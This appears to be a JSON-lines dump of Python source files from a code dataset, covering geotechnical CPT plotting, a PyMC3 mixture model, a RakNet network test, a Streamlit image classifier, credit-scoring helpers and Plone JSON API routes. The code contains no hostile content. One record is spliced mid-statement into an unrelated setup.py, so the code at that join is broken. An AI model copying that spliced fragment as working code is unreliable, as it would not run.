Default: 0.1 MPa.\n        new: bool, only for cpt type, optional for the classification default:True\n            If True and the classification is robertson, the new(2016) implementation of robertson is used.\n        show: bool\n            If True the plot is shown, else the matplotlib.pyplot.figure is returned\n        figsize: tuple\n            Figsize of the plot, default (11, 8).\n        df_group: polars.DataFrame, only for cpt type, optional for the classification\n            Use this argument to plot a defined soil layering next to the other subplots.\n            It should contain the columns:\n            - layer\n                Name of layer, should be either a BeenJefferies or Robertson soil type,\n                if it is different then also the argument colors should be passed.\n            - z_centr_NAP\n                Z value of the middle of the layer\n            - thickness\n                Thickness of the layer\n        do_grouping: bool, only for cpt type, optional for the classification\n            If True a group classification is added to the plot.\n        grid_step_x: float, only for cpt type, default: None\n            Grid step for qc and Fr subplots.\n        dpi: int\n            Dpi of the figure\n        colors: dict\n            Dictionary containing the colors associated with each soil type, if specified\n        z_NAP: bool\n            If True the Z-axis is with respect to NAP.\n        Returns\n        -------\n        matplotlib.pyplot.figure\n        \"\"\"\n        # todo: refactor arguments, the arguments connected to each other should\n        # be given as a dict or tuple, check order\n        if classification is None:\n            df = self.df\n        else:\n            df = self.classify(\n                classification=classification,\n                water_level_NAP=water_level_NAP,\n                water_level_wrt_depth=water_level_wrt_depth,\n                p_a=p_a,\n                new=new,\n            )\n\n        if df_group is None and do_grouping is True:\n            df_group = self.classify(\n                classification=classification,\n                water_level_NAP=water_level_NAP,\n                water_level_wrt_depth=water_level_wrt_depth,\n                p_a=p_a,\n                new=new,\n                do_grouping=True,\n                min_thickness=min_thickness,\n            )\n\n        return plot.plot_cpt(\n            df,\n            df_group,\n            classification,\n            show=show,\n            figsize=figsize,\n            grid_step_x=grid_step_x,\n            colors=colors,\n            dpi=dpi,\n            z_NAP=z_NAP,\n        )\n","sub_path":"pygef/cpt.py","file_name":"cpt.py","file_ext":"py","file_size_in_byte":14052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"524025892","text":"# -*- coding: utf-8 -*-\n\nfrom operator import itemgetter\n\n\ndef filter_rows_by_tuple(df, list_of_keys, list_of_values):\n    \"\"\"\n    Filter rows by tuple of keys\n    :param pandas.core.frame.DataFrame df:\n    :param list[str] list_of_keys: fields to get values in `list_of_values`\n    :param list[tuple] list_of_values: values corresponding with the order of field name\n    :return list:\n    \"\"\"\n    result = []\n    if df.empty is False:\n        new_df = df.copy()\n\n        new_df['grouped_keys'] = df[list_of_keys].apply(lambda row: itemgetter(*list_of_keys)(row), axis=1)\n        new_df['is_selected'] = new_df.apply(lambda row: row['grouped_keys'] in list_of_values, axis=1)\n        result = new_df['is_selected'].values.tolist()\n    return result\n","sub_path":"SI/si_core/utils/dataframe_utils.py","file_name":"dataframe_utils.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"570916237","text":"import sys\nimport numpy as np\nfrom collections import defaultdict\nimport pickle as pkl\n\nimport pymc3 as pm\nimport theano\nimport theano.tensor as tt\n#theano.config.gcc.cxxflags = \"-fbracket-depth=10000\"\nfrom generate_data import generate_data,generate_data_holdout\n\n\ndef GEM(beta):\n    \"\"\"Griffiths-Engen-McCloskey distribution\"\"\"\n    
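# Stick-breaking weights: pi_k = beta_k * prod_{j<k}(1 - beta_j); prepending 1 shifts the cumulative product by one step.\n    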
pi = tt.concatenate([[1], tt.extra_ops.cumprod(1 - beta)[:-1]])\n    return (beta * pi)\n\n\ndef stickbreak_prior(name,a,shape):\n    \"\"\"truncated stick-breaking construction\"\"\"\n    gamma = pm.Gamma('gamma_{}'.format(name),1.,1.)\n    delta = pm.Gamma('delta_{}'.format(name),1.,a)\n    beta_prime = tt.stack([pm.Beta('beta_prime_{}_{}'.format(name,k),1.,gamma) for k in range(shape)])\n    beta = GEM(beta_prime)\n    return(beta*delta)\n\n\ndef loglik(theta,phi):\n    def llik(featvar_id):\n        lliks = pm.math.logsumexp(tt.log(theta) + tt.dot(featvar_id,tt.log(phi.T)),axis=1)\n        return(tt.sum(lliks))\n    return(llik)\n\n\ndef fit_model_LN(N,J,D,R,T,Sigmas,featvar_id,filename,c,normalize,batch=False):\n    model = pm.Model()\n    with model:\n        \"\"\"hyperparameters\"\"\"\n        theta_prior = stickbreak_prior('theta',1.,T)\n        alpha = .1\n        \"\"\"priors\"\"\"\n        theta = pm.Dirichlet('theta',theta_prior,shape=T)\n        psi = [[pm.MvNormal('psi_{}_{}'.format(t,d),mu=tt.zeros(R[d]),cov=tt.exp(-Sigmas[d]),shape=R[d]) for d in range(D)] for t in range(T)]\n        phi = tt.stack([tt.concatenate([pm.Deterministic('phi_{}_{}'.format(t,d),\n                                                         tt.nnet.softmax(psi[t][d]))[0]\n                                        for d in range(D)]) \n                        for t in range(T)])\n        \"\"\"likelihood\"\"\"\n        target = pm.DensityDist('target',loglik(theta=theta,phi=phi),observed=dict(featvar_id=featvar_id))\n        \"\"\"fit model\"\"\"\n        inference = pm.ADVI()\n        inference.fit(100000, obj_optimizer=pm.adam(learning_rate=.01,beta1=.8),callbacks=[pm.callbacks.CheckParametersConvergence()])\n        trace = inference.approx.sample()\n        posterior = {k:trace[k] for k in trace.varnames if not k.endswith('__')}\n        posterior['ELBO'] = inference.hist\n        if batch == False:\n            f = open('posterior_LN_{}_{}_{}.pkl'.format(filename.split('.')[0],c,normalize),'wb')\n        else:\n            f = open('posterior_LN_{}_{}_{}_holdout_{}.pkl'.format(filename.split('.')[0],c,normalize,batch),'wb')\n        pkl.dump(posterior,f)\n        f.close()\n\n\n\ndef fit_model_dir(N,J,D,R,T,featvar_id,filename,c,normalize,batch=False):\n    print(normalize)\n    print(batch)\n    model = pm.Model()\n    with model:\n        \"\"\"hyperparameters\"\"\"\n        theta_prior = stickbreak_prior('theta',1.,T)\n        alpha = .1\n        \"\"\"priors\"\"\"\n        theta = pm.Dirichlet('theta',theta_prior,shape=T)\n        phi = tt.stack([tt.concatenate([pm.Dirichlet('phi_{}_{}'.format(t,d),tt.ones(R[d])*alpha,shape=R[d]) for d in range(D)]) for t in range(T)])\n        \"\"\"likelihood\"\"\"\n        target = pm.DensityDist('target',loglik(theta=theta,phi=phi),observed=dict(featvar_id=featvar_id))\n        \"\"\"fit model\"\"\"\n        inference = pm.ADVI()\n        inference.fit(100000, obj_optimizer=pm.adam(learning_rate=.01,beta1=.8),callbacks=[pm.callbacks.CheckParametersConvergence()])\n        trace = inference.approx.sample()\n        posterior = {k:trace[k] for k in trace.varnames if not k.endswith('__')}\n        posterior['ELBO'] = inference.hist\n        if batch == False:\n            f = open('posterior_dir_{}_{}_{}.pkl'.format(filename.split('.')[0],c,normalize),'wb')\n        else:\n            f = open('posterior_dir_{}_{}_{}_holdout_{}.pkl'.format(filename.split('.')[0],c,normalize,batch),'wb')\n        pkl.dump(posterior,f)\n        f.close()\n\n\nT = 5\ndef main():\n    batch = ''\n    normalize = True\n    if len(sys.argv) < 3:\n        print('usage: python DPMM_pm.py DATA_SET_NAME prior={dir,LN} chain normalize{TRUE,FALSE} [hold_out batch]')\n    else:\n        if len(sys.argv) > 4 and sys.argv[4] == 'FALSE':\n            normalize = False\n        filename = sys.argv[1]\n        print('processing_{}'.format(filename))\n        if len(sys.argv) == 7 and sys.argv[5] == 'hold_out':\n            batch = sys.argv[6]\n            N,J,D,R,Y,Sigmas,hold_in,hold_out,ethnic_id = 
generate_data_holdout(filename,batch,normalize)\n N,J,D,R,Y,Sigmas,featvar_id,ethnic_id = generate_data(filename,normalize)\n print(D,Y)\n chain = sys.argv[3]\n if sys.argv[2] == 'dir':\n if batch != '':\n fit_model_dir(N,J,D,R,T,hold_in,filename,chain,normalize,batch)\n else:\n fit_model_dir(N,J,D,R,T,featvar_id,filename,chain,normalize)\n if sys.argv[2] == 'LN':\n if batch != '':\n fit_model_LN(N,J,D,R,T,Sigmas,hold_in,filename,chain,normalize,batch)\n else:\n fit_model_LN(N,J,D,R,T,Sigmas,featvar_id,filename,chain,normalize)\n\n\nif __name__=='__main__':\n main()\n","sub_path":"DPMM_pm.py","file_name":"DPMM_pm.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"267114653","text":"import codecs\nimport sys\nimport pyraknet\nimport gevent\nfrom gevent import Greenlet\nimport struct\nimport timeit\nfrom codecs import encode\n\nCLIENT_PORT = 3000\nSERVER_PORT = 4000\n\nTYPE_CLIENT = 0\nTYPE_SERVER = 1\n\nID_GAME_PACKET = pyraknet.ID_USER_PACKET_ENUM + 1\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef create_instance(host='127.0.0.1', port=4000):\n peer: pyraknet.RakPeerInterface = pyraknet.RakPeerInterface.GetInstance()\n \n socket_descriptor = pyraknet.SocketDescriptor(port, host)\n \n success = peer.Startup(1, socket_descriptor, 1)\n assert success == pyraknet.RAKNET_STARTED\n\n return peer\n\ndef send_data(peer: pyraknet.RakPeerInterface, address, ms_delay): \n gevent.sleep(ms_delay / 1000)\n packet = b''\n packet += struct.pack('=0.3.2', 'asyncio'],\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.3\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Intended Audience :: Developers\",\n \"Development Status :: 2 - Pre-Alpha\"])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433774718","text":"from fastai.vision import open_image, load_learner, image, torch\nimport streamlit as st\nimport numpy as np\nimport matplotlib.image as mpimg\nimport os\nimport time\nimport PIL.Image\nimport requests\nfrom io import BytesIO\n\n\n#App title\nst.title(\"Rock Classifier\")\n\n\n#loads model and makes prediction\ndef predict(img, display_img):\n\n # Display the test image\n st.image(display_img, use_column_width=True)\n\n # Temporarily displays a message while executing \n with st.spinner('Wait for it...'):\n time.sleep(3)\n\n # Load model and make prediction\n model = load_learner('/home/cate/Cate/DSI/Rock-Classifier/model/', 'stage-1.pkl')\n pred_class = model.predict(img)[0] # get the predicted class\n pred_prob = round(torch.max(model.predict(img)[2]).item()*100) # get the max probability\n \n # Display the prediction\n if str(pred_class) == 'chip':\n st.success(\"This is in class chip with the probability of \" + str(pred_prob) + '%.')\n elif str(pred_class) == 'fines':\n st.success(\"This is in class fines with the probability of \" + str(pred_prob) + '%.')\n elif str(pred_class) == 'lump':\n st.success(\"This is in class lump with the probability of \" 
+ str(pred_prob) + '%.')\n elif str(pred_class) == 'mixed':\n st.success(\"This is in class mixed with the probability of \" + str(pred_prob) + '%.')\n else:\n st.success(\"This is in class pellets with the probability of \" + str(pred_prob) + '%.')\n\noption = st.radio('', ['Choose a test image', 'Choose your own image'])\n\nif option == 'Choose a test image':\n \n # Test image selection\n test_images = os.listdir('/home/cate/Cate/DSI/Rock-Classifier/samp/')\n test_image = st.selectbox(\n 'Please select a test image:', test_images)\n \n # Read the image\n file_path = '/home/cate/Cate/DSI/Rock-Classifier/samp/' + test_image\n img = open_image(file_path)\n \n # Get the image to display\n display_img = mpimg.imread(file_path)\n \n # Predict and display the image\n predict(img, display_img)\n\nelse:\n url = st.text_input(\"Please input a url:\")\n if url != \"\":\n try:\n # Read image from the url\n response = requests.get(url)\n pil_img = PIL.Image.open(BytesIO(response.content))\n display_img = np.asarray(pil_img) # Image to display\n \n # Transform the image to feed into the model\n img = pil_img.convert('RGB')\n img = image.pil2tensor(img, np.float32).div_(255)\n img = image.Image(img)\n \n # Predict and display the image\n predict(img, display_img)\n \n except:\n st.text(\"Invalid url!\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"356626252","text":"import os\nimport re\nimport numpy \nimport pandas\nimport datetime\nimport collections\nfrom matplotlib import colors as mcolors\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import cohen_kappa_score\n\ndef getAbsolutePath(fileName):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(script_dir, '../../' + fileName)\n\ndef removeSpecialCharacters(value):\n return re.sub('[^A-Za-z0-9]+', ' ', str(value))\n\ndef searchInData(data, refString):\n refString = removeSpecialCharacters(refString)\n for x in data:\n if refString in x:\n print(x)\n\ndef cleanDataColumns(data):\n trueCol = []\n for col in data.columns:\n trueCol.append(removeSpecialCharacters(col))\n data.columns = trueCol\n return data\n\ndef cleanCpf(cpfString):\n cpfString = cpfString.replace('.','')\n cpfString = cpfString.replace('-','')\n return int(cpfString) \n\ndef renameColumn(data, oldColumnName, newColumnName):\n columns = list(data.columns)\n if oldColumnName not in columns:\n print('Couldnt find ',oldColumnName)\n return\n colIndex = columns.index(oldColumnName)\n columns[colIndex] = newColumnName\n data.columns = columns\n\n\ndef isDuplicatesPresent(column):\n L = list(column)\n most_common,num_most_common = collections.Counter(L).most_common(1)[0]\n return num_most_common > 1\n \n###############################################################################################################3\n# THESE MAY APPEAR IN OTHER PLACES AS WELL\n###############################################################################################################3\n\ndef _convertStringToFloatLatin(columnToConvert):\n for i in columnToConvert.index:\n try:\n columnToConvert.at[i] = _floatLatin(columnToConvert.loc[i])\n except ValueError:\n print('IN COL: ', columnToConvert.name, ' VALUE: ', columnToConvert.at[i], ' IS NOT A FLOAT')\n return\n columnToConvert = columnToConvert.astype(float)\n return columnToConvert\n\ndef _floatLatin(entry):\n if _isNan(entry):\n 
return numpy.nan\n entry = str(entry).replace(',','.')\n return float(entry)\n\ndef _isNan(value):\n if isinstance(value, str):\n return value == 'nan'\n else:\n return numpy.isnan(value)\n\ndef _convertDateToAgeInYears(data, colName):\n _convertDateToFloatLatin(data,[colName])\n data.loc[:,colName] = data.loc[:,colName] - data.loc[:,' Data']\n data.loc[:,colName] = data.loc[:,colName]/365\n return data\n\n\ndef _convertDateToFloatLatin(data, dateColumns):\n for col in dateColumns:\n columnToConvert = data.loc[:,col]\n for i in columnToConvert.index:\n try:\n columnToConvert.at[i] = _calculateAge(columnToConvert.loc[i])\n except:\n print('IN COL: ',col, ' VALUE: ', columnToConvert.at[i], ' IS NOT A DATE')\n return\n data[col] = data.loc[:,col].astype(float)\n\ndef _getDate(dateStr):\n if _isNan(dateStr):\n return numpy.nan\n day = ''\n month = ''\n year = ''\n flag = 'readDay'\n for iChar in dateStr:\n if iChar == ' ':\n break\n elif iChar == '/':\n if flag == 'readDay':\n flag = 'readMonth'\n elif flag == 'readMonth':\n flag = 'readYear'\n elif flag == 'readDay':\n day += iChar\n elif flag == 'readMonth':\n month += iChar\n elif flag == 'readYear':\n year += iChar\n return [int(day),int(month),int(year)]\n\ndef _calculateAge(strDate):\n strFormat = _getDate(strDate)\n try:\n day = strFormat[0]\n month = strFormat[1]\n year = strFormat[2]\n return (datetime.datetime.now() - datetime.datetime(year,month,day)).days\n except:\n return numpy.nan \n\ndef predictionsSum(pred, pagoTest, atrasoTest):\n sumPago = 0.0\n sumAtraso = 0.0\n for i in range(len(pred)):\n if pred[i] == '0':\n sumPago += float(pagoTest[i])\n sumAtraso += float(atrasoTest[i])\n return [sumPago, sumAtraso]\n\ndef inadimplenciaEmReais(prediction):\n testCols = dp.getTestSavedColumns()\n [pago, atraso] = predictionsSum(prediction, testCols['VlrPago'], testCols['VlrEmAtraso'])\n accuracy = (prediction == dp.getYtest())\n countPred = collections.Counter(prediction)\n aceites = countPred['0']\n print('aceites: ', aceites)\n print('acuracia: ',round((accuracy.mean())*100),'%')\n print('Inadimplencia: ', round(100*atraso/pago),'%')\n print('prejuizo absoluto: ', round(atraso/1e6,2), ' milhoes')\n print('prejuizo por numeros de aceites: ', atraso/aceites, ' reais')\n \ndef printFeaturesImportances(dp, model):\n xtestCols = list(dp.getXtest().columns)\n colsImport = model.feature_importances_\n for xCols,colsImp in zip(xtestCols,colsImport):\n print(xCols, ' ',round(100*colsImp,1),'%') \n\ndef calculateComprometimentoDeRenda(data):\n comprometimento = []\n for i in data.index:\n pclAbe = float(data.loc[i,'Valor Parcelas em aberto Banco Semear Consulta Proposta JRetail PF '])\n pclCompra = float(data.loc[i,'Valor Parcela da compra Banco Semear Consulta Proposta JRetail PF '])\n renda = float(data.loc[i,'Valor Renda Banco Semear Consulta Proposta JRetail PF '])\n compRenda = (pclAbe + pclCompra) / renda\n comprometimento.append(compRenda)\n data['comprometimento'] = comprometimento\n data = data.drop(['Valor Parcelas em aberto Banco Semear Consulta Proposta JRetail PF '],axis=1)\n data = data.drop(['Valor Parcela da compra Banco Semear Consulta Proposta JRetail PF '],axis=1)\n data = data.drop(['Valor Renda Banco Semear Consulta Proposta JRetail PF '],axis=1)\n return data\n \n\ndef breakColIntoAdimAndFraud(colName, data, targetCol = 'Inadimplente'):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n x = data.loc[:,[colName,targetCol]].copy()\n nanIndexes = pandas.isnull(x).any(1).nonzero()[0]\n x = x.drop(nanIndexes)\n x = 
x.drop([targetCol],axis=1)\n y = data.loc[:,targetCol].copy()\n y = y.drop(nanIndexes)\n adimI = y[y=='0'].index\n inadI = y[y=='1'].index\n notFraudInd = data[data.loc[:,'VlrPago'] != 0].index \n y = y.drop(notFraudInd)\n inadFraudI = y[y=='1'].index\n xinad = x.loc[inadI].copy()\n xadim = x.loc[adimI].copy()\n inadFraud = x.loc[inadFraudI].copy()\n return [xadim, xinad,inadFraud]\n\ndef breakColIntoAdimAndInad(colName, data, targetCol = 'Inadimplente'):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n x = data.loc[:,[colName,targetCol]].copy()\n nanIndexes = pandas.isnull(x).any(1).nonzero()[0]\n x = x.drop(nanIndexes)\n x = x.drop([targetCol],axis=1)\n y = data.loc[:,targetCol].copy()\n y = y.drop(nanIndexes)\n adimI = y[y=='0'].index\n inadI = y[y=='1'].index\n xinad = x.loc[inadI].copy()\n xadim = x.loc[adimI].copy()\n return [xadim, xinad]\n\n\ndef histogramPlotFraud(xadim, xinad, xFraud, ylim = 2000):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n colName = list(xadim.columns)[0] \n fig = plt.figure()\n plt.hist(numpy.array(xadim),color=colors['b'])\n plt.hist(numpy.array(xinad),color=colors['g'])\n plt.hist(numpy.array(xFraud),color=colors['r'])\n plt.ylabel('Count')\n plt.xlabel(colName)\n plt.ylim(0,ylim)\n fig.savefig('histogram--' + colName + '.png', dpi=150)\n \ndef removeOutliers(col, cutValue, flag='greater'):\n if flag == 'greater':\n indexCut = col[col.values > cutValue].index\n return col.drop(indexCut)\n elif flag == 'lower':\n indexCut = col[col.values < cutValue].index\n return col.drop(indexCut)\n \ndef removeOutliersWithLimits(xVector, outliersLimits):\n if len(outliersLimits) == 0:\n return xVector\n if outliersLimits[0] != None:\n xVector = removeOutliers(xVector, outliersLimits[0], 'lower')\n if outliersLimits[1] != None:\n xVector = removeOutliers(xVector, outliersLimits[1])\n return xVector\n\ndef printModelPredictionsSmartCredit(yReal, prediction):\n confusionMatrix = confusion_matrix(yReal,prediction)\n print('Inadimplencia final: ', round(100*confusionMatrix[1][0] /(confusionMatrix[1][0] + confusionMatrix[0][0])),'%')\n print('Dos inadimplentes, acertei: ',round(100*confusionMatrix[1][1] /(confusionMatrix[1][0] + confusionMatrix[1][1])),'%')\n print('Dos adimplentes, acertei: ',round(100*confusionMatrix[0][0] /(confusionMatrix[0][0] + confusionMatrix[0][1])),'%')\n print('KAPPA: ',cohen_kappa_score(yReal,prediction))\n confusionPlot(yReal, prediction)\n\ndef confusionPlot(Ytest, predictions):\n confusionMatrix = confusion_matrix(Ytest, predictions)\n print(confusionMatrix)\n seaPlot = sns.heatmap(confusionMatrix, square=True, annot=True, cbar=False)\n plt.xlabel('predicted value')\n plt.ylabel('true value')\n plt.show()\n\ndef generateScoreTable(model, dataX, dataY):\n dataX.index = range(len(dataX))\n dataPred = model.predict_proba(dataX)\n dataPred = pandas.DataFrame(data = dataPred)\n dataPred.columns = model.classes_\n dataPred['score'] = dataPred.loc[:,'0'] * 1000\n dataPred['Inadimplente'] = list(dataY)\n return dataPred\n \n ","sub_path":"core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222117371","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom plone import api as ploneapi\nfrom plone.jsonapi.core import router\n\nfrom Products.CMFCore.interfaces import ISiteRoot\nfrom Products.ZCatalog.interfaces import ICatalogBrain\nfrom Products.ATContentTypes.interfaces import 
IATContentType\nfrom plone.dexterity.interfaces import IDexterityContent\nfrom plone.dexterity.utils import getAdditionalSchemata\n\n# request helpers\nfrom plone.jsonapi.routes.request import get_sort_limit\nfrom plone.jsonapi.routes.request import get_sort_on\nfrom plone.jsonapi.routes.request import get_sort_order\nfrom plone.jsonapi.routes.request import get_query\nfrom plone.jsonapi.routes.request import get_creator\nfrom plone.jsonapi.routes.request import get_request_data\n\nfrom plone.jsonapi.routes.interfaces import IInfo\n\nfrom plone.jsonapi.routes import underscore as _\nfrom plone.app.dexterity.behaviors.metadata import ICategorization\nfrom plone.namedfile.interfaces import INamedBlobFileField,INamedBlobImageField\nfrom plone.namedfile import NamedBlobFile, NamedBlobImage\nfrom plone.app.dexterity.behaviors.metadata import IPublication\nfrom base64 import b64decode\nfrom AccessControl import getSecurityManager\nfrom AccessControl import Unauthorized\nfrom Products.CMFCore import permissions\n\nfrom plone.app.contenttypes.behaviors.leadimage import ILeadImage\n\n\nlogger = logging.getLogger(\"plone.jsonapi.routes\")\n\n\n#-----------------------------------------------------------------------------\n# Json API (CRUD) Functions\n#-----------------------------------------------------------------------------\n\n# GET\ndef get_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" returns a list of items\n\n 1. If the UID is given, fetch the object directly => should return 1 item\n 2. If no UID is given, search for all items of the given portal_type\n \"\"\"\n # contains the full query with params\n query = make_query(request, portal_type=portal_type)\n if uid is not None: query[\"UID\"] = uid\n\n results = search(request, **query)\n\n # if the uid is given, get the complete information set\n complete = uid and True or False\n return make_items_for(results, endpoint, complete=complete)\n\n\n### CREATE\ndef create_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" create items\n\n 1. If the uid is given, get the object and create the content in there\n (assumed that it is folderish)\n 2. If no uid is given, the target folder is the portal.\n \"\"\"\n\n # destination where to create the content\n dest = uid and get_object_by_uid(uid) or None\n\n # extract the data from the request\n records = get_request_data(request)\n\n results = []\n for record in records:\n if dest is None:\n # find the container for content creation\n dest = find_target_container(record, portal_type)\n obj = create_object_in_container(dest, portal_type, record)\n results.append(obj)\n\n return make_items_for(results, endpoint=endpoint)\n\n### UPDATE\ndef update_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" update items\n\n 1. If the uid is given, the user wants to update the object with the data\n given in request body\n 2. 
If no uid is given, the user wants to update a bunch of objects.\n \"\"\"\n\n # the data to update\n records = get_request_data(request)\n\n objects = []\n if uid:\n objects.append(get_object_by_uid(uid))\n else:\n # get the objects for the given uids\n objects = (map(get_object_by_uid, _.pluck(records, \"uid\")))\n\n results = []\n for obj in objects:\n # get the update dataset for this object\n gsm = getSecurityManager()\n if not gsm.checkPermission(permissions.ModifyPortalContent, obj):\n raise Unauthorized(\"You may not modify this object\")\n\n if uid:\n record = records and records[0] or {}\n else:\n # the uid is inside the payload\n record = filter(lambda d: get_uid(obj) == d.get(\"uid\"), records)\n record = record and record[0] or {}\n\n # do a wf transition\n if record.get(\"transition\", None):\n t = record.get(\"transition\")\n logger.info(\">>> Do Transition '%s' for Enquiry %s\", t, obj.getId())\n do_action_for(obj, t)\n\n obj = update_object_with_data(obj, record)\n results.append(obj)\n return make_items_for(results, endpoint=endpoint)\n\n### DELETE\ndef delete_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" delete items\n\n 1. If the uid is given, we can ignore the request body and delete the\n object with the given uid (if the uid was valid).\n 2. If no uid is given, the user wants to delete more than one item.\n => go through each item and extract the uid. Delete it afterwards.\n // we should do this kind of transaction base. So if we can not get an\n // object for an uid, no item will be deleted.\n 3. we could check if the portal_type matches, just to be sure the user\n wants to delete the right content.\n \"\"\"\n\n objects = []\n if uid:\n objects.append(get_object_by_uid(uid))\n else:\n payload = get_request_data(request)\n objects = (map(get_object_by_uid, _.pluck(payload, \"uid\")))\n\n results = []\n for obj in objects:\n result = {\"id\": obj.getId()}\n result[\"deleted\"] = ploneapi.content.delete(obj) == None and True or False\n results.append(result)\n\n return results\n\n#-----------------------------------------------------------------------------\n# Data Functions\n#-----------------------------------------------------------------------------\n\ndef make_items_for(brains_or_objects, endpoint, complete=True):\n \"\"\" return a list of info dicts\n \"\"\"\n def _block(brain):\n info = dict(api_url=url_for(endpoint, uid=get_uid(brain)))\n # update with std. 
catalog metadata\n info.update(IInfo(brain)())\n\n # switch to wake up the object and complete the informations with the\n # data of the content adapter\n if complete:\n obj = get_object(brain)\n info.update(IInfo(obj)())\n info.update(get_parent_info(obj))\n return info\n\n return map(_block, brains_or_objects)\n\n\ndef get_parent_info(obj):\n \"\"\" returns the infos for the parent object\n \"\"\"\n\n parent = get_parent(obj)\n endpoint = get_endpoint(parent.portal_type)\n\n if ISiteRoot.providedBy(parent):\n return {\n \"parent_id\": parent.getId(),\n \"parent_uid\": 0\n }\n\n return {\n \"parent_id\": parent.getId(),\n \"parent_uid\": get_uid(parent),\n \"parent_url\": url_for(endpoint, uid=get_uid(parent))\n }\n\ndef get_subcontents(parent, ptype):\n \"\"\" returns the contained contents\n \"\"\"\n\n # get the contained objects\n children = parent.listFolderContents(\n contentFilter={\"portal_type\": [ptype]})\n\n # get the endpoint for the searched results\n endpoint = get_endpoint(ptype)\n\n items = []\n for child in children:\n info = dict(api_url=url_for(endpoint, uid=get_uid(child)))\n info.update(IInfo(child)())\n info.update(get_parent_info(child))\n items.append(info)\n\n return {\n \"url\": url_for(endpoint),\n \"count\": len(items),\n \"items\": items\n }\n\n#-----------------------------------------------------------------------------\n# Portal Catalog Helper\n#-----------------------------------------------------------------------------\n\ndef search(*args, **kw):\n \"\"\" search the portal catalog \"\"\"\n pc = get_portal_catalog()\n return pc(*args, **kw)\n\ndef make_query(request, **kw):\n \"\"\" generates a content type query suitable for the portal catalog\n \"\"\"\n\n # build the catalog query\n query = {\n \"sort_limit\": get_sort_limit(request),\n \"sort_on\": get_sort_on(request),\n \"sort_order\": get_sort_order(request),\n \"SearchableText\": get_query(request),\n }\n\n # inject keyword args\n query.update(kw)\n\n # inject the creator if given\n if get_creator(request):\n query[\"Creator\"] = get_creator(request)\n\n logger.info(\"Catalog Query --> %r\", query)\n return query\n\n#-----------------------------------------------------------------------------\n# Functional Helpers\n#-----------------------------------------------------------------------------\n\ndef get_portal():\n \"\"\" return the Plone site \"\"\"\n return ploneapi.portal.getSite()\n\ndef get_tool(name):\n \"\"\" return a Plone tool by name \"\"\"\n return ploneapi.portal.get_tool(name)\n\ndef get_portal_catalog():\n \"\"\" return portal_catalog tool \"\"\"\n return get_tool(\"portal_catalog\")\n\ndef get_portal_reference_catalog():\n \"\"\" return reference_catalog tool \"\"\"\n return get_tool(\"reference_catalog\")\n\ndef get_portal_types_tool():\n \"\"\" return the portal types tool \"\"\"\n return get_tool(\"portal_types\")\n\ndef get_portal_workflow():\n \"\"\" return portal_workflow tool \"\"\"\n return get_tool(\"portal_workflow\")\n\ndef url_for(endpoint, **values):\n \"\"\" returns the api url\n \"\"\"\n return router.url_for(endpoint, force_external=True, values=values)\n\ndef get_uid(obj):\n \"\"\" get the UID of the brain/object\n \"\"\"\n if ICatalogBrain.providedBy(obj):\n return obj.UID\n if ISiteRoot.providedBy(obj):\n return \"siteroot\"\n return obj.UID()\n\ndef get_schema(obj):\n \"\"\" return the schema of this type \"\"\"\n if IATContentType.providedBy(obj):\n return obj.schema\n pt = get_portal_types_tool()\n fti = pt.getTypeInfo(obj.portal_type)\n return 
fti.lookupSchema()\n\ndef get_behaviors_schema(obj):\n return list(getAdditionalSchemata(obj))\n\ndef get_object(brain_or_object):\n \"\"\" return the referenced object \"\"\"\n if not ICatalogBrain.providedBy(brain_or_object):\n return brain_or_object\n return brain_or_object.getObject()\n\ndef get_parent(brain_or_object):\n \"\"\" return the referenced object \"\"\"\n obj = get_object(brain_or_object)\n return obj.aq_parent\n\ndef get_endpoint(portal_type):\n \"\"\" get the endpoint for this type \"\"\"\n # handle portal types with dots\n portal_type = portal_type.split(\".\").pop()\n # remove whitespaces\n portal_type = portal_type.replace(\" \", \"\")\n # lower and pluralize\n portal_type = portal_type.lower() + \"s\"\n\n return portal_type\n\ndef get_object_by_uid(uid):\n \"\"\" return the object by uid\n \"\"\"\n if not uid:\n raise RuntimeError(\"No UID given\")\n\n obj = None\n pc = get_portal_catalog()\n rc = get_portal_reference_catalog()\n res = pc.search(dict(UID=uid))\n\n if len(res) > 1:\n raise ValueError(\"More than one object found for UID %s\" % uid)\n elif len(res) == 0:\n # try with the ref catalog\n obj = rc.lookupObject(uid)\n else:\n obj = res[0].getObject()\n\n if obj is None:\n raise KeyError(\"No Objects found for UID 